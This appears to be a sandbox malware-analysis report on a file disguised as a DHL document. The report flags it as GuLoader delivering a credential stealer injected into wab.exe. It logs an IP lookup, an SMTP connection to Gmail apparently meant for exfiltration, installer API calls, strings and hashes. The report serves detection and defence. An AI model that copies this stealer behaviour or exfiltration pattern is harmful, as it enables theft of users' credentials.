Aug 29, 2024 12:24:48.100565910 CEST	1289	IN	Data Raw: 64 c8 87 2f 79 99 b4 6a e0 56 3a e1 40 1d 09 c7 5c 2e 87 54 41 05 e4 db 5c ac c7 46 64 63 8e 10 33 ea 87 31 74 63 e3 ab d8 b1 ea 09 05 e0 4e fb 69 bb 5e 21 9c d2 a4 2c 0d 2b ef 21 b6 e0 a9 8e b9 43 9c c2 56 7f 7d 9f 0d d0 b0 ce ac 5f 42 56 1b 09 Data Ascii: d/yjV:@\.TA\Fdc31tcNi^!,+!CV}_BVvw5&&F(cfO[I?ZQWrcatnQy Z_.mp7qB}jfk".1C;HVu[+t/JsGH{3ySL>xL

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49843	104.26.12.205	443	2640	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 10:24:50 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-08-29 10:24:51 UTC	211	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 10:24:51 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8babd56f0cfbc55f-IAD
2024-08-29 10:24:51 UTC	13	IN	Data Raw: 31 30 32 2e 31 36 35 2e 34 38 2e 37 34 Data Ascii: 102.165.48.74

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Aug 29, 2024 12:24:54.010840893 CEST	587	49844	172.253.62.108	192.168.11.20	220 smtp.gmail.com ESMTP d75a77b69052e-45682c8277csm3734901cf.3 - gsmtp
Aug 29, 2024 12:24:54.011126995 CEST	49844	587	192.168.11.20	172.253.62.108	EHLO 724536
Aug 29, 2024 12:24:54.139844894 CEST	587	49844	172.253.62.108	192.168.11.20	250-smtp.gmail.com at your service, [102.165.48.74] 250-SIZE 35882577 250-8BITMIME 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-PIPELINING 250-CHUNKING 250 SMTPUTF8
Aug 29, 2024 12:24:54.140108109 CEST	49844	587	192.168.11.20	172.253.62.108	STARTTLS
Aug 29, 2024 12:24:54.265098095 CEST	587	49844	172.253.62.108	192.168.11.20	220 2.0.0 Ready to start TLS

Target ID:	0
Start time:	06:22:44
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\DHL Page1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Page1.exe"
Imagebase:	0x400000
File size:	909'168 bytes
MD5 hash:	E563153089B05A25E30DB0A73E196B10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.123227921774.0000000007E0B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:24:33
Start date:	29/08/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Page1.exe"
Imagebase:	0x5b0000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.127076986570.00000000377C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.7%
Dynamic/Decrypted Code Coverage:	13.9%
Signature Coverage:	20.9%
Total number of Nodes:	1518
Total number of Limit Nodes:	42

Executed Functions

Function 0040346C Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040348F
GetVersion.KERNEL32 ref: 00403495
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BE
#17.COMCTL32(00000007,00000009), ref: 004034E1
OleInitialize.OLE32(00000000), ref: 004034E8
SHGetFileInfoW.SHELL32(0042B248,00000000,?,000002B4,00000000), ref: 00403504
GetCommandLineW.KERNEL32(00433F20,NSIS Error), ref: 00403519
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\DHL Page1.exe",00000000), ref: 0040352C
CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL Page1.exe",00000020), ref: 00403553

Part of subcall function 0040660E: GetModuleHandleA.KERNEL32(?,00000020,?,004034D5,00000009), ref: 00406620
Part of subcall function 0040660E: GetProcAddress.KERNEL32(00000000,?), ref: 0040663B

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040368D
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040369E
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036AA
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036BE
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036C6
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036D7
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036DF
DeleteFileW.KERNELBASE(1033), ref: 004036F3

Part of subcall function 00406234: lstrcpynW.KERNEL32(?,?,00000400,00403519,00433F20,NSIS Error), ref: 00406241

OleUninitialize.OLE32(?), ref: 004037BE
ExitProcess.KERNEL32 ref: 004037DF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Page1.exe",00000000,?), ref: 004037F2
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Page1.exe",00000000,?), ref: 00403801
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Page1.exe",00000000,?), ref: 0040380C
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Page1.exe",00000000,?), ref: 00403818
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403834
DeleteFileW.KERNEL32(0042AA48,0042AA48,?,00436000,?), ref: 0040388E
CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL Page1.exe,0042AA48,?), ref: 004038A2
CloseHandle.KERNEL32(00000000,0042AA48,0042AA48,?,0042AA48,00000000), ref: 004038CF
GetCurrentProcess.KERNEL32(00000028,?), ref: 004038FE
OpenProcessToken.ADVAPI32(00000000), ref: 00403905
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040391A
AdjustTokenPrivileges.ADVAPI32 ref: 0040393D
ExitWindowsEx.USER32(00000002,80040002), ref: 00403962
ExitProcess.KERNEL32 ref: 00403985

Strings

"C:\Users\user\Desktop\DHL Page1.exe", xrefs: 0040351F, 00403525, 0040371B
\Temp, xrefs: 004036A4
C:\Users\user\AppData\Local\Temp\, xrefs: 00403682, 00403687, 0040369D, 004036A9, 004036B8, 004036C5, 004036D1, 004036D9, 004037EF, 00403800, 0040380B, 00403817, 00403824, 00403833, 004038E4
Low, xrefs: 004036C0
SeShutdownPrivilege, xrefs: 00403914
1033, xrefs: 004036EE
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage, xrefs: 0040379B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage, xrefs: 00403670, 00403790, 0040383A, 00403844
C:\Users\user\Desktop\DHL Page1.exe, xrefs: 0040389D
C:\Users\user\Desktop, xrefs: 00403811, 00403816, 00403843
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403483
UXTHEME, xrefs: 004034B2, 004034B7, 004034BD
TMP, xrefs: 004036DA
~nsu, xrefs: 004037EA
TEMP, xrefs: 004036D2
.tmp, xrefs: 00403806
Error launching installer, xrefs: 00403775
NSIS Error, xrefs: 0040350A

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\DHL Page1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL Page1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-2975922820
Opcode ID: 2da3462b9ec5dddd6da4cee4044f7adbee930a5b9da6a655544961324f182cec
Instruction ID: 11d77c6df3e33b162af4eec1f1e25d37dd2296380ae56d2b6bbcb8daeeaa14dd
Opcode Fuzzy Hash: 2da3462b9ec5dddd6da4cee4044f7adbee930a5b9da6a655544961324f182cec
Instruction Fuzzy Hash: DFD1F371100310ABE3207F759D45A2B3AA9EB8070AF11483FF981B62E1DB7D89558B6E

Function 004054D2 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405530
GetDlgItem.USER32(?,000003EE), ref: 0040553F
GetClientRect.USER32(?,?), ref: 0040557C
GetSystemMetrics.USER32(00000002), ref: 00405583
SendMessageW.USER32(?,00001061,00000000,?), ref: 004055A4
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004055B5
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055C8
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055D6
SendMessageW.USER32(?,00001024,00000000,?), ref: 004055E9
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040560B
ShowWindow.USER32(?,00000008), ref: 0040561F
GetDlgItem.USER32(?,000003EC), ref: 00405640
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405650
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405669
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405675
GetDlgItem.USER32(?,000003F8), ref: 0040554E

Part of subcall function 0040432D: SendMessageW.USER32(00000028,?,?,00404159), ref: 0040433B

GetDlgItem.USER32(?,000003EC), ref: 00405692
CreateThread.KERNELBASE(00000000,00000000,Function_00005466,00000000), ref: 004056A0
CloseHandle.KERNELBASE(00000000), ref: 004056A7
ShowWindow.USER32(00000000), ref: 004056CB
ShowWindow.USER32(000103DC,00000008), ref: 004056D0
ShowWindow.USER32(00000008), ref: 0040571A
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040574E
CreatePopupMenu.USER32 ref: 0040575F
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405773
GetWindowRect.USER32(?,?), ref: 00405793
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057AC
SendMessageW.USER32(?,00001073,00000000,?), ref: 004057E4
OpenClipboard.USER32(00000000), ref: 004057F4
EmptyClipboard.USER32 ref: 004057FA
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405806
GlobalLock.KERNEL32(00000000), ref: 00405810
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405824
GlobalUnlock.KERNEL32(00000000), ref: 00405844
SetClipboardData.USER32(0000000D,00000000), ref: 0040584F
CloseClipboard.USER32 ref: 00405855

Strings

{, xrefs: 00405738

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 02917508575c5947e81d9450990c89721220ca0e3d7cab6b387563a8846f8888
Instruction ID: dc7bbf886be487b306171a2164c28a2220a031177b651aae269613cc5d4e9b95
Opcode Fuzzy Hash: 02917508575c5947e81d9450990c89721220ca0e3d7cab6b387563a8846f8888
Instruction Fuzzy Hash: 20B137B1900608FFDB11AF60DD85EAE7B79FB08355F00803AFA45B61A0CB755A51DF68

Function 00406256 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,?,004053CA,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 00406319
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406397
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004063AA
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063E6
SHGetPathFromIDListW.SHELL32(?,Call), ref: 004063F4
CoTaskMemFree.OLE32(?), ref: 004063FF
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406423
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,?,004053CA,Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000000,00000000,00000000), ref: 0040647D

Strings

Call, xrefs: 00406280, 00406360, 00406381, 00406396, 004063A9, 004063C5, 004063F0, 00406422, 00406428, 00406442, 00406456, 00406476, 0040647C, 00406488, 004064BB
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040641D
Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll, xrefs: 0040627B
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406365

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-2121271985
Opcode ID: 00aadd241932dadc362f6b834cbb9b2880397ab50fd9815523d8905ab181eb5a
Instruction ID: b056fad8d3bd0605b9c0c77c9c79e7764d1f24d849fb2afebe56385b15959c95
Opcode Fuzzy Hash: 00aadd241932dadc362f6b834cbb9b2880397ab50fd9815523d8905ab181eb5a
Instruction Fuzzy Hash: B4614431A00114AADF209F68CD40AAE37A5BF54314F16C13FE947BA2D0D77D9AA1CB9D

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Function 00405A25 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,754F3420,754F2EE0,00000000), ref: 00405A4E
lstrcatW.KERNEL32(0042F290,\*.*,0042F290,?,?,754F3420,754F2EE0,00000000), ref: 00405A96
lstrcatW.KERNEL32(?,0040A014,?,0042F290,?,?,754F3420,754F2EE0,00000000), ref: 00405AB9
lstrlenW.KERNEL32(?,?,0040A014,?,0042F290,?,?,754F3420,754F2EE0,00000000), ref: 00405ABF
FindFirstFileW.KERNELBASE(0042F290,?,?,?,0040A014,?,0042F290,?,?,754F3420,754F2EE0,00000000), ref: 00405ACF
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B6F
FindClose.KERNEL32(00000000), ref: 00405B7E

Strings

"C:\Users\user\Desktop\DHL Page1.exe", xrefs: 00405A25
\*.*, xrefs: 00405A90

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\DHL Page1.exe"$\*.*
API String ID: 2035342205-2628486231
Opcode ID: 790878d1883c619e2d90dcb5f02a42ffccef8b8de064fb120c2f00b1d1973b2f
Instruction ID: 7272181c32e1f057aeb14691d6a2555d11cfe5c650e93729dd2f0f8f1d0f80c1
Opcode Fuzzy Hash: 790878d1883c619e2d90dcb5f02a42ffccef8b8de064fb120c2f00b1d1973b2f
Instruction Fuzzy Hash: 7E41D430900A14AACB21AB659C89EBF7678EF41728F24417FF801761D1D77C7981CE6E

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085F0,?,?,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage, xrefs: 004021C3

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage
API String ID: 542301482-2332303660
Opcode ID: 7ed6d7f179b345aae6b4327b02c64d324b96f8d885cdf54a11ec98757db65b93
Instruction ID: 5958ae04ff9ddd9b90f956fc3eb81f74ce24abb364fc99247a43ffb266dbad8b
Opcode Fuzzy Hash: 7ed6d7f179b345aae6b4327b02c64d324b96f8d885cdf54a11ec98757db65b93
Instruction Fuzzy Hash: CC414C71A00215AFCB00EFE4CD88A9D7BB5FF48358B20457AF505EB2D1DBB99982CB44

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: a0d33996fa0be51fbf4c124d813c9dd807b9501485eba97d8546454eb0cd087f
Instruction ID: 62fb22e7ab1684179ceac61b9f843ffea96df1620cda5c9d8d0b31a7b0d02902
Opcode Fuzzy Hash: a0d33996fa0be51fbf4c124d813c9dd807b9501485eba97d8546454eb0cd087f
Instruction Fuzzy Hash: F6E0D832A082048FD714DBF4AE844AE73B0EB40328721453FE402F20D0CBF848409F6C

Function 00406577 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,004302D8,0042FA90,00405D39,0042FA90,0042FA90,00000000,0042FA90,0042FA90, 4Ou.Ou,?,754F2EE0,00405A45,?,754F3420,754F2EE0), ref: 00406582
FindClose.KERNEL32(00000000), ref: 0040658E

Memory Dump Source

Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
